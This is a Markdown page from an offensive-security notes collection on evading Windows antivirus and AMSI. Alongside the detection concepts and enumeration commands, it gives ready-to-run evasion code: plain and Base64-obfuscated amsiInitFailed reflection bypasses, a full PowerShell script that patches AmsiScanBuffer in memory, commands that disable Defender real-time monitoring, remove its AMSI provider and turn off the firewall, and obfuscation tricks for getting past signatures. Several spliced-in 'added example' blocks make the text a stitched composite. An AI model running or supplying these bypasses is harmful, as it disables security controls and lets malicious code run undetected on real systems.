killchain-compendium/post_exploitation/docs/windows/antivirus_evasion.md

Antivirus Evasion

  • Existing types

    • On-Disk evasion -- the file written to disk must not match any static signature (packing, encryption or obfuscation of the binary itself)
    • In-Memory evasion -- the payload never touches disk in its final form; it is decrypted and executed in memory, so only runtime checks can see it
  • Detection Methods

    • Static Detection -- hash or string/byte matching against a signature database, without executing the sample
    • Dynamic Detection -- predefined rules applied while the sample runs inside a sandbox, watching the API calls and syscalls it makes at runtime
    • Heuristic / Behavioural Detection -- suspicious traits are scored, either from static analysis of the decompiled code or from dynamically observed behaviour, and a verdict is raised once the score crosses a threshold
  • Additional Features

    • Unpacker -- decrypts and decompresses packed samples so the static engine sees the real code
    • PE header parser -- portable executable headers (sections, imports, entry point) are parsed and checked for anomalies
    • Emulation -- the sample is executed in an emulated environment, cheaper than a full sandbox, so it unpacks itself and reveals its behaviour

Enumeration

  • List the AV products registered with Security Center (client SKUs only; the namespace does not exist on Windows Server)
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayName,productState,pathToSignedProductExe
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
  • Check the Defender service and whether real-time protection is on
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
  • Check firewall
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | select DisplayName, Enabled, Description
  • Check whether a local port is reachable (look at TcpTestSucceeded)
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
  • Check Windows Defender preferences and its active Attack Surface Reduction rules (AttackSurfaceReductionRules_Ids and AttackSurfaceReductionRules_Actions are parallel arrays; action 0 = disabled, 1 = block, 2 = audit, 6 = warn)
powershell -c "Get-MpPreference"
powershell -c "Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids"
  • Check tamper protection (5 = enabled, 4 = disabled); while it is on, Set-MpPreference changes such as disabling real-time monitoring have no effect
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection
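The checks above gathered into one function, as an added example that is not part of the original page. It assumes the productState decoding shown in the comments, which is the community interpretation of an undocumented Security Center bitfield; that root/SecurityCenter2 exists (client SKUs only, so Products comes back empty on Windows Server); and that the Defender PowerShell module is present for the Get-Mp* calls. The function name Get-AvPosture is this example's own.

```powershell
# Added example, not from the original page: the enumeration checks above
# collapsed into one posture object.
# Assumptions: productState decoding (middle byte 10/11 = engine on, low byte
# 00 = signatures current) is the undocumented community interpretation;
# root/SecurityCenter2 exists only on client SKUs; Get-Mp* need the Defender module.
function Get-AvPosture {
    [CmdletBinding()]
    param()

    # Registered AV products, with productState decoded from its hex form.
    $products = @(Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hex = '{0:X6}' -f [int]$_.productState          # e.g. 397568 -> "061100"
            [pscustomobject]@{
                Name       = $_.displayName
                Enabled    = $hex.Substring(2, 2) -in @('10', '11')   # assumption: middle byte = engine state
                SigCurrent = $hex.Substring(4, 2) -eq '00'            # assumption: low byte = signature age
                Exe        = $_.pathToSignedProductExe
            }
        })

    $mp   = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $pref = Get-MpPreference     -ErrorAction SilentlyContinue

    # HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection: 5 = on, 4 = off
    $tpRaw = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' `
                -Name TamperProtection -ErrorAction SilentlyContinue).TamperProtection
    $tp = if ($tpRaw -eq 5) { 'On' } elseif ($tpRaw -eq 4) { 'Off' } else { "Unknown ($tpRaw)" }

    # ASR: _Ids and _Actions are parallel arrays; 0 = disabled, 1 = block, 2 = audit, 6 = warn
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    $asr  = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $asr[$ids[$i]] = $acts[$i] }

    [pscustomobject]@{
        Products         = $products
        DefenderService  = (Get-Service WinDefend -ErrorAction SilentlyContinue).Status
        AntivirusEnabled = $mp.AntivirusEnabled
        RealTimeEnabled  = $mp.RealTimeProtectionEnabled
        TamperProtection = $tp
        AsrRules         = $asr
        FirewallProfiles = @(Get-NetFirewallProfile | Select-Object Name, Enabled)
    }
}

Get-AvPosture | Format-List
```

Every call uses -ErrorAction SilentlyContinue so the function still returns a (partial) object on a server, on a host without Defender, or without admin rights; missing data shows up as empty fields rather than as a terminating error.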

Reset Options

  • Disable all three firewall profiles (needs local admin; the change is recorded in the Windows Firewall event log, so it is noisy)
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False

Antimalware Scan Interface (AMSI)

                  |          Win32 API              |        COM API         |        AV Provider
Interpreter --> AmsiScanString / AmsiScanBuffer --> IAntimalware::Scan() --> IAntimalwareProvider::Scan()

  • AmsiScanString is a thin wrapper that passes the string's bytes to AmsiScanBuffer, so patching AmsiScanBuffer covers both entry points
  • amsi.dll is loaded inside the calling process (PowerShell, WScript, .NET, Office VBA), which is why an unprivileged process can tamper with it before the provider ever sees the content

Return Result/Response Codes

AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768

  • The AmsiResultIsMalware() macro treats any result >= AMSI_RESULT_DETECTED as malware. A failing HRESULT from AmsiScanBuffer is not a result at all, and PowerShell treats a failed scan as not detected, which is what the ScanBuffer patch further down exploits

PowerShell Downgrade Attack

  • Start the PowerShell 2.0 engine, which predates AMSI (and script block logging). It only works if the .NET Framework 3.5 (2.0 CLR) is installed; the engine is deprecated and an optional feature on current Windows 10/11 builds, and the start is visible as EngineVersion=2.0 in the Windows PowerShell event log (event 400)
PowerShell -Version 2

Reflection Bypass

  • Flips the private static field amsiInitFailed in System.Management.Automation.AmsiUtils to true, so PowerShell skips every later AmsiScanBuffer call in this process. No admin rights needed, but the plain one-liner is itself signatured, hence the encoded variant below

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

or an obfuscated version (the two Base64 blobs decode, as UTF-16LE, to 'AmsiUtils' and 'amsiInitFailed')

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

  • Admin-only alternatives that act on the provider side instead: remove Defender's AMSI provider registration (the GUID is Defender's provider CLSID; it takes effect for newly started processes), or turn off real-time monitoring (ignored while tamper protection is on)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true

AMSI ScanBuffer patch

  • amsi.dll is loaded into the PowerShell process at startup and every script block is handed to its exported AmsiScanBuffer; because the DLL lives in the attacker's own process it can be patched without admin rights (current process only)
  • Get a handle to amsi.dll (GetModuleHandle / LoadLibrary)
  • Resolve the address of AmsiScanBuffer (GetProcAddress)
  • Change the memory protection of the first bytes of AmsiScanBuffer to writable (VirtualProtect, PAGE_EXECUTE_READWRITE)
  • Write opcodes that return before any scanning happens, typically mov eax, 0x80070057 ; ret (E_INVALIDARG): the caller sees a failed scan, which PowerShell treats as not detected
  • BC-Security's AMSI bypass
  • RastaMouse's AMSI bypass
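The steps above written out in PowerShell, as an added example that is neither the page's code nor the published BC-Security or RastaMouse script (it follows the same approach). It assumes an x86/x64 process, where the return value lives in EAX/RAX, so mov eax, 0x80070057 ; ret makes AmsiScanBuffer fail with E_INVALIDARG; the Kernel32 wrapper class, the function names and the Test-AmsiBlocked check (built on Microsoft's documented AMSI test sample string) are this example's own. Unobfuscated like this, the script is itself flagged when it is loaded, which is what the Validate and obfuscation sections of this page are for.

```powershell
# Added example, not from the original page: in-process AmsiScanBuffer patch.
# Assumptions: x86/x64 calling convention (return value in EAX/RAX); the
# Kernel32 wrapper, function names and test string check are this example's own.

if (-not ('Kernel32' -as [type])) {
    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    public static extern IntPtr LoadLibrary(string lpFileName);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
}

function Invoke-AmsiScanBufferPatch {
    # 1. Handle to amsi.dll (already mapped into powershell.exe; LoadLibrary just returns it)
    $hAmsi = [Kernel32]::LoadLibrary('amsi.dll')
    if ($hAmsi -eq [IntPtr]::Zero) { throw 'amsi.dll is not loaded' }

    # 2. Address of the exported AmsiScanBuffer
    $addr = [Kernel32]::GetProcAddress($hAmsi, 'AmsiScanBuffer')
    if ($addr -eq [IntPtr]::Zero) { throw 'AmsiScanBuffer not found' }

    # 3. Make the prologue writable: 0x40 = PAGE_EXECUTE_READWRITE
    $patch = [byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)   # mov eax, 0x80070057 ; ret
    $old = 0
    if (-not [Kernel32]::VirtualProtect($addr, [UIntPtr][uint32]$patch.Length, 0x40, [ref]$old)) {
        throw 'VirtualProtect failed'
    }

    # 4. Overwrite the first six bytes with the early return
    [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $addr, $patch.Length)

    # 5. Put the original protection back (the code bytes stay patched)
    [void][Kernel32]::VirtualProtect($addr, [UIntPtr][uint32]$patch.Length, $old, [ref]$old)
    return $addr
}

function Test-AmsiBlocked {
    # Microsoft's documented AMSI test sample, assembled at runtime so the
    # literal does not sit in this script block; evaluating it as a new
    # script block forces a fresh AmsiScanBuffer call.
    $sample = 'AMSI Test Sample: 7e72c3ce-861b-4339-' + '8740-0ac1484c1386'
    try   { Invoke-Expression "'$sample'" | Out-Null; return $false }
    catch { return $true }
}

"Blocked before patch: $(Test-AmsiBlocked)"
Invoke-AmsiScanBufferPatch | Out-Null
"Blocked after patch:  $(Test-AmsiBlocked)"
```

With Defender's provider active the first line prints True and the second False; the patch only affects the PowerShell process it runs in, and Defender still logs the test-sample detection that happened before the patch.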

Other Bypasses and Tools

Validate

  • AMSITrigger identifies the strings in a script that trigger AMSI detections, by feeding the file through AmsiScanBuffer in chunks
  • Use it to validate obfuscation: after each round, check which strings still trigger AMSI
  • AMSITrigger Repo
.\AMSITrigger.exe -u <URL> -f 1

or

.\AMSITrigger.exe -i <file> -f 1

  • -f 1 prints only the triggering strings; -f 2 adds line numbers and -f 3 highlights them inline in the script

Further Obfuscation

  • String concatenation -- AMSI scans the script text as it is handed over, so a signatured string that only exists after evaluation is not matched statically
$OBF = 'Ob' + 'fu' + 's' + 'cation'
  • Concatenate - ('co'+'ffe'+'e')
  • Reorder - ('{1}{0}'-f'ffee','co')
  • Whitespace - ( 'co' +'fee' + 'e')
  • The assembled string is scanned again if it is later turned into a new script block (Invoke-Expression), so the obfuscation has to hold until the moment of execution

Type Obfuscation

  • Replace a fully qualified .NET type name that is itself a signature with a custom PowerShell type accelerator registered at runtime, so the real name never appears in the script text
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
  • With
[dorkstork]::copy($buf, 0, $BufferAddress, 6);
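How a name like [dorkstork] becomes a valid type, as an added example that is not the page's code: PowerShell keeps its type accelerators ([int], [psobject], ...) in an internal class reachable through reflection, and a new entry can be registered at runtime. The alias name is the page's; Register-TypeAlias and the unmanaged scratch buffer are this example's own, used instead of a function prologue so the block runs harmlessly.

```powershell
# Added example, not from the original page: register a type accelerator so the
# Marshal type name never appears in the script, then use it exactly as the
# page's [dorkstork]::copy line does, against a self-allocated buffer.
function Register-TypeAlias {
    param([string]$Alias, [type]$Target)
    # Internal class, but its static Add/Get members are callable via reflection.
    $accel = [psobject].Assembly.GetType('System.Management.Automation.TypeAccelerators')
    if (-not $accel::Get.ContainsKey($Alias)) { $accel::Add($Alias, $Target) }
    return $accel::Get[$Alias]
}

# The target name can itself be assembled at runtime, so neither half is a static signature.
$marshal = Register-TypeAlias -Alias 'dorkstork' -Target ([type]('System.Runtime.InteropServices.' + 'Marshal'))

# Constructed input: the six patch bytes from the ScanBuffer section, copied into
# unmanaged memory we own rather than into amsi.dll.
$buf = [byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
$BufferAddress = [dorkstork]::AllocHGlobal($buf.Length)
[dorkstork]::copy($buf, 0, $BufferAddress, 6)

# Read the bytes back to prove the alias resolved to Marshal and the copy happened.
$back = New-Object byte[] 6
[dorkstork]::Copy($BufferAddress, $back, 0, 6)
[dorkstork]::FreeHGlobal($BufferAddress)

"Alias resolves to: $($marshal.FullName)"
"Bytes round-tripped: $($back -join ',')"
```

The accelerator lives only in the current session's table; a fresh PowerShell process does not know [dorkstork], so the registration line has to ship with the script, and it is the one place an analyst can still spot the real type, which is why the target name is concatenated as well.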

Automated Obfuscation

PowerShell

Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\String\1,2,\Whitespace\1' -Quiet -NoExit

Other Tools

  • ThreatCheck pinpoints the exact bytes that Defender (or AMSI, with -e AMSI) flags in a file, by splitting it until the smallest flagged chunk is found
    • Has to be built with Visual Studio; the build outputs a DLL, an executable and an XML file
    • ThreatCheck.exe -f <file>
  • DefenderCheck -- the original tool ThreatCheck was forked from; Defender only